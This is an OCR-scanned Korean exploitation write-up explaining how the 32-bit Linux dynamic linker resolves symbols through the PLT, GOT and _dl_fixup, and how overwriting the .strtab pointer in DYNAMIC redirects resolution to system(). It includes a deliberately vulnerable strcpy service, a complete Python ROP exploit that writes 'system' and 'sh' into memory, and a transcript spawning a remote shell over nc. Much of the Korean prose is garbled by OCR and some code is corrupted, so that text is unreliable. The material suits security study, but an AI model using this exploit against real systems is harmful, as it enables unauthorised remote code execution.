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Ox1. Dynamic linker?

Dynamic linking&tAlS X|Qlst= =z s MAsiH Z& ZiojE22{2|&1F &4 Dynamic
linker7} M22[0] HMEH 3520|222t 2
start-up ZEE 7K U run-timedf| ZFK2}0
stk

dynamic linker7} O{EH SZtst=X|0f CHSHA] ZiCtst =2 0288 ZHMEe| 2o 2 oy == 13
Ol A dynamic linkerQ| =¥1}H S Ot = ESHCT
D2 2o| AAL ofzfet ZC}.

// hello.c
#include <stdio.h>

int main ()

{
puts ("hello!");
return 0;

[pwn3r@localhost test]$ gcc -o hello hello.c

[pwn3r@localhost test]$ file hello

hello: ELF 32-bit LSB executable, Intel 803860, version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.32, not stripped
[pwn3r@localhost test]$ ./hello

hello!

> W7tMo 2 ZAXxE BEE2Z Ed|| dynamic linking 242 AFESIEE compilek|d| YS= & =+

UL

main &t4=Z disassemble 8l &L}

(gdb) disas main

Dump of assembler code for function main:
0x080483b4 <+0>: push %ebp
0x080483b5 <+1>: mov %esp, sebp
0x080483b7 <+3>: and SOxXfffff£f£f0, $Sesp
0x080483ba <+6>: sub $0x10, $esp
0x080483bd <+9>: movl $0x8048494, (%esp)
0x080483c4 <+16>: call 0x80482f0 <puts@plt>
0x080483c9 <+21>: mov $0x0, $eax
0x080483ce <+26>: leave
0x080483cf <+27>: ret

End of assembler dump.

> HE a2 Lot JEANY maingt0d ZAE =9

2 = I3l putset+E = EotC.
=2 FE0 e BB €S EU puts@pltatl EA[Z[O{ QUCH

rir




puts@plt & =57 2|3l disassemble off £LC}.

(gdb) disas 0x080482f0

Dump of assembler code for function puts@plt:
0x080482f0 <+0>: Jmp *0x8049630
0x080482f6 <+6>: push $0x10
0x080482fb <+11>: jmp 0x80482c0

(gdb) x/x 0x8049630

0x8049630 < GLOBAL OFFSET TABLE +20>: 0x080482f6

> puts@plte| A HH2 puts &9 GOT(Global Offset Table)o| Y= FTAE EXS| M=Zst=
B E20|Ct. dynamic linker7} SHHE 3L |X| A X7|0|= GOTO| plt+6 ( 0x080482f6 ) FTATt
A0 CtZ FHHZ 0[0j7tn, HtZ O] 222 E dynamic linker2 7 &5t= —.—TOIEf g £+ UCL

plt + 60| M= reloc_offset( Z10)| A 0x10 )& pushstl 0x080482c0C 2 & 7|SHCt

puts @ plt + 110A &7|ot X222 O|SHLAL

(gdb) x/2i 0x80482c0
0x80482c0: pushl 0x8049620 // 2}0|EZZ| HEE 1= link map 72X ZEQIH
0x80482c6: jmp *0x8049624

/*
(gdb) x/x 0x8049620

0x8049620 < GLOBAL_ OFFSET TABLE +4>: 0x0011£900
*/

> &9 gtojlgeig] HEE Y1Ue link.map EM O] F=A( 20 M 0x0011£900 )& pushst
11 0x8049624 ( GOT + 8)0f Y= #fS=z2 E7|st= HE&0| Lt

“pushl BH2 QEAMEES FX5H0 O F40 Us ¢S 2= pushStCt

0x8049624 ( GOT + 8 = dynamic linker®| _dl_runtime_resolve & FA7F =0 /U0

_dl_runtime_resolve &2 Z7|5}H E=ILC}

Of2fl= _dl_runtime_resolve &£ disassembledt codeO|LC}.

(gdb) x/111i dl runtime resolve

0x1153a0 < dl runtime resolve>: push  %eax
0x1153al < dl runtime resolve+l>: push  %ecx
0x1153a2 < dl runtime resolve+2>: push  %edx
0x1153a3 < dl runtime resolve+3>: mov 0x10 (%esp), %edx // 0x10
0x1153a7 < dl runtime resolve+7>: mov 0xc (%esp),%eax // 0x0011£f900
0x1153ab < dl runtime resolve+ll>: call 0x10ec60 < dl fixup>
0x1153b0 < dl runtime resolve+l6>: pop Fedx
0x1153bl < dl runtime resolve+l7>: mov ($esp) , secx
0x1153b4 < dl runtime resolve+20>: mov %eax, (%esp) // eax=puts@libc
0x1153b7 < dl runtime resolve+23>: mov 0x4 (%esp) , seax
0x1153bb < dl runtime resolve+27>: ret $0xc

> _dl_runtime_resolve &40 puts@plt7} ==l & push=l & Zf (0x10, 0x0011f900 )& QIX}

2 5ty _dl_fixupgt+E S &30t




(gdb) x/1i S$eip
=> 0xl0ec7a < dl fixup+26>:

mov 0x4 (%ecx) , %ecx

(gdb) x/x Secx + 4
0x8049574 < DYNAMIC+36>: 0x080481fc // &.strtab
<DYNAMICMI MO Q= .strtabl| F=A>

_dl_fixup =0 DYNAMIC + 360 HEL|{Ue= .strtabMMO| FA( 2 Z0|A 0x080481fc )
£ 7tM1 , strtabMMAL0| e S("puts)o| I AM( otz 20N 0x29 )& ¥ F
2 O 258 2+30| A= HEZ2|FA( otz 2I10|A 0x08048225 )F FLotCt.

(gdb) x/i Seip
=> 0x10ecf8 < dl fixup+152>: add (%edi) , %esi

// *edi = 0x29 , esi = &.strtab

(gdb) x/x $edi

0x80481dc: 0x00000029

(gdb) x/s S$esi + 0x29 // &.strtab + 0x29 = &”puts”

0x8048225: "puts"

<strtabFA + 0x29 = &"puts” (=T &4+H)>
Jdg|a gH0o| Qe HEe| TAE eax0| @10 _dl_lookup_symbol x&t4+& S ESHCL.
0x0010ed20 <+192>: mov %esi, $eax
0x0010ed22 <+194>: call 0x10a940 < dl lookup_ symbol x>
<& E QIXtZ 510 _dl_lookup_symbol x &4 s=>

_dI_lookup_symbol_x &= 2t0|E2|Z2|Lfe| SYMTABF AR ZI0|EZE| A|AFAE AT
_difixup &2 Z0t2™ SYMTABO| QU= puts 0| @Mt 2t0|E222| A|RFAE O A
M etolEziz|gsol FAE TFotCh O|EA T3t puts ol FAE GOTO| writedt =
_dl_runtime_resolvegt=2 ZO0IQ} X[AEHQ} AEBS HE|5t1 ZF2H0|EZ 2|0 U= puts =
2 go7HA L
SHEOIEZ 2|0 Us HA SdF=FAE GOTO| write7] IZ0| O putsgts =& O|F CiA|
putsgt=7t & & WA dynamic linker7} FAE 20t = aPF( 0 A HEE )2 HA|
X 43 puts@pltof M $HHO| SFEOIEE|[g+2 HO{7tA EC}




Ox2. Trick

Ox1ZOA dynamic linker7t @ &3 30| s HEZ2FAE F5t0 , 0| 08¢l XBH
2 Zfetol2geof JAs HA g+FAE Fol2Ce A2 Yo EUCH

07| _dI_lookup_symbol x0f QIXt2 Hoi7t= B2 REE £ UCHH , Z|eto|=e{Z|of
UAe ol gt EIFSSICHe M2 2 siE = A2 Aol

strtab2 write® 0| Gl Hl22[0f UA7| I{EO| XF strtabdl| A= EXAES Z&T = giCt

OFQF DYNAMIC QOI0f A 7|&BH0| QICHH DYNAMIC ¥O0| QU= strtab ZQIE|E write H3HO|
Ue CHE MR FAE EQAESEE HFAZ|D , 7|EQ| strtabl} et=FHuto| 2EMZS Fot
20| ot= e M=CtH oEA

CIHAE 0|88l HAESEAL

(gdb) x/i S$eip
=> 0Oxl0ec7a < dl fixup+26>: mov 0x4 (%ecx) , $ecx

(gdb) x/x Secx + 4
0x8049574 < DYNAMIC+36>: 0x080481fc // 0x080481fc = &.strtab
// DYNAMIC + 36 is pointing .strtab

(gdb) x/s 0x080481fc + 0x29
0x8049661: "puts"
// Offset between string “puts” and .strtab is 0x29

(gdb) set *0x08049574 = 0x08049638 // 0x08049638 = &.bbs
// Overwriting .strtab pointer to address of .bss

(gdb) set *(0x08049638 + 0x29) = 0x74737973
(gdb) set *(0x08049638 + 0x29 + 0x4) = 0x00006d65
// (0x08049638 + 0x29) = “system”

(gdb) x/s 0x08049638 + 0x29
0x8049661: "system"

> DYNAMIC Y HO|M strtabTASE ZQESI= HEES write@30] Y= bssPHO| FA( 20|
A 0x08049638 )= HHZAA|ZICH
2| 7|&EQ| strtab FTALQF EXAYE “puts” FAO IAMOl 0x29E .bssTFAE TR0

“system”0|2t= ZALE S writeRl Lt

O|A| _dI_lookup_symbol x&7t S=E|7| 2F0| eax0f U= Zf2 =OIS| 2K}

(gdb) x/i S$eip

=> 0x10ed22 < dl fixup+194>: call 0x10a940 < dl lookup symbol x>
(gdb) x/s S$eax

0x8049661 : "system"

> _dl_lookup_symbol_x &4=9| QIX}Z “system”O|2t= EAILEO| AT S0t

M
-




O|X| SFetol=22{2|9| systemts SES 2QU5t7| 28 SFEH0[E2{2|2] systemet==0f break

pointE Z1 continuedf 2 X}

(gdb) b system
Breakpoint 5 at 0x15bebO0

(gdb) c

Continuing.

Breakpoint 5, 0x0015beb0 in system () from /lib/libc.so.6

(gdb) x/i $eip

=> 0x15beb0 <system>: sub $0x10, $esp

> XL R systemedplt SEE AS = 7H55HRAL, 0|24 DYNAMIC 0| A 7[#THO|
ACHH DYNAMIC FAof QUes strtab ZQAHE ZRESID 25 P2 H22|0| writedHF
dynamic linkerS FAFBSLO] AFBAIZF I8t @olo| Bi4E SHA|Z 4 UCks 20| =Y

Ct.




0x3. Reusing dynamic linker for exploitation

o
)l
0x

of ol oM MHE WHS 0|8 xinetdo| M HEOE SOprHe ZtEret mz I
& 0

#include <stdio.h>
char tmp[1024];

int main ()

{
char buf[256];
printf ("pwn3r says hi!\n")
printf ("You say : ");
fflush (stdout) ;
fgets(tmp , 1024 , stdin);
strcpy (buf , tmp);
return 0;

}

> strcpy B2 256byteo| Hi YO Z|Cf 1024byte| O|O|EHE =Z2Atst?| {20 Th=3dF stack-
based buffer overflow F 2F& 0| 2HAiSICE

strcpy@plt7t EXHSIE R strepyz &S &9 0|85 St= MZ2|0] |st= HO|HE =AY +=
olCt.

AA

0x08048522 <+94>: call 0x80483e0 <strcpyl@plt>

> strcpyS 0|83 HEZ2|0 Us EAES FHZO0 S5 S+HOZ “system”0|2H XS 1t
systemgt4=0| QIXZ AFEE “sh'2 Atge oj=eof BHED , DYNAMIC ¥oo| e .

2t =
FZOIEO CtE write #3H0| Je Y| FTAE EAA|Z|LD dynamic linkere| ZEIS

I:I
=

Z return o}
L& 3l dynamic linkere systemgt=0| FAZ HH0IQ} X ZEXMO 2 system(‘sh”),& Mgt Z 0|
C}.
0x80496e8 < DYNAMIC+36>: 0x08048268
0x80482aa: "printf"

0x80482aa - 0x08048268 = 0x42

> strtabZ= A~ ( 008048268 )2t "printf"F A ( 0x080482aa )°| @I Al2 0x42 A =oldt = QICt.

0x8048398: 0x08049798
0x08049798 + 0x42 = 0x80497da

> write #3H0| Qe O E2|F4A( 0x08049798 )& EQIESI= 0|2 2|( 0x08048398 )& AQLY
* SH= HEO|LHZ|0f A 0x080497982 .data¥ <

strcpy et 0| 238l DYNAMIC + 36( .strtab TAE 7}2 |= HZ2| , 0x080496e8 )0

write 20| QU= W EZ|FA(0x08049798 )2 HO{F11 , 0x08049798 + 0x42 H 20

"system”O|2t= ZAEE THEL




gdrHoZ ALBY “system”O|2t= EALED systemBg QIXIE ALY "sh'Ete EAEE DHE
=0 AL8E =AtES HZ2|o|AM ZOoHZEL

0x80482a2: “s”

0x804829d: "y"

0x80482a2: "s"

0x80482ae: "tf"

0x804828e: "ed"

0x80482cb: "main"

0x80482da: 0x00

0x804827d: "so.o6"

0x8048308: "h"

strcpyE AEC2 2 DESM ff SAES SAAFA EAEE UHEW E|l=0 , Oof2io] U= pop ;
pop ;ret; AEE 0|88} call-chaing T4 %= QIC|

0x08048493 <+83>: pop sebx

0x08048494 <+84>: pop sebp

0x08048495 <+85>: ret

O|H 0|5 ECH= Exploits -3l E AL

#!/usr/bin/python

from struct import pack

import sys

p = lambda x : pack("<L" , x)

strcpy plt = 0x80483e0 # strcpy @ plt

printf plt = 0x80483f0 # printf @ plt

strtab ptr = 0x80496e8 # &.strtaba® ZEQIHSI= M EEZ| (DYNAMIC + 36)
freespace ptr = 0x804823c # writable®t YOl ZEOIH

freespace = 0x080497e0 # writabledt Y

symspace = freespace + 0x42 # 4 “system”E writed FTA

argspace = freespace + 0x10 # QlX} “sh”"E writed™ T4

ppr = 0x8048493 # pop ebx; pop ebp; ret HHO| JY&s 2o F=A

symbytes = [0x80482a2 , 0x804829d , 0x80482a2 , 0x80482ae , 0x804828e ,

0x80482cb , 0x80482da] # “system”9| Zt ZX} ZOIE
argbytes = [0x804827d , 0x8048308] # “sh”9| Zt =X} ZOIH

payload = ""




for i in range (0, len(symbytes)) :
payload += p(strcpy plt)
payload += p(ppr)
payload += p(symspace + 1i)
payload += p(symbytes[i])

for i in range (0, len(argbytes)):

payload += p(strcpy plt)
payload += p(ppr)

payload += p(argspace + 1i)
payload += p(argbytes([i])

payload += p(strcpy plt)

payload += p(ppr)

payload += p(strtab ptr) # .strtabFA ZOI
o

E-
payload += p(freespace ptr) # write #H%t U= HE22|FA EZQH

payload += p(printf plt + 6) # dynamic linker REIOZ 2|H
payload += p(0Oxdeadbeef)

=

payload += p(argspace) # strcpyZ HE0{F EXY “sh”9| FA

sys.stdout.write ("a"*268 + payload)

> FZZ2 AMS 7878EEOAM ZOH7t= xinetd 222 =2{F1 2| exploitg 0|23 A0

N BHg o=t

[pwn3r@localhost boom]$ (./exploit.py ; cat) | nc 192.168.235.129 7878
pwn3r says hi!

You say

id

uid=515 (boom) gid=515 (boom) groups=515 (boom)

context=unconfined u:system r:inetd child t:s0-s0:c0.c1023

> MZXOZ Shell 8 2S3ULC}




0x04. Conclusion

X| 27X dynamic linkerE 0|88} exploitst=L| AFEE 4= A& 7|&2 AIWSHALCE
¢l 7|22 fedora coreo| ZMUHF( ZME LAIFH0|A )2l fedora core 160|A AH7t5E 0] =0l
E[RACH

SHX|BF Ubuntu XA S HIZ3f HEH linux0| A DYNAMICM MO write®3t0] Qi7|IH20] O]
e AEE = BlOoIA ol

J2{L} DYNAMICM MO M7 Hsto] U [f H 74K ZAD TFSCHH null byte@lo] Ydhe
Z9eto|=22| 48 5L ODE ASIR, NXE BE 238 4 & Halgh 7|20/7|=
SiLt

LSS0l &0l X2 M 0] 7|2 A83 MUE exploits 2GS AHIEC} )



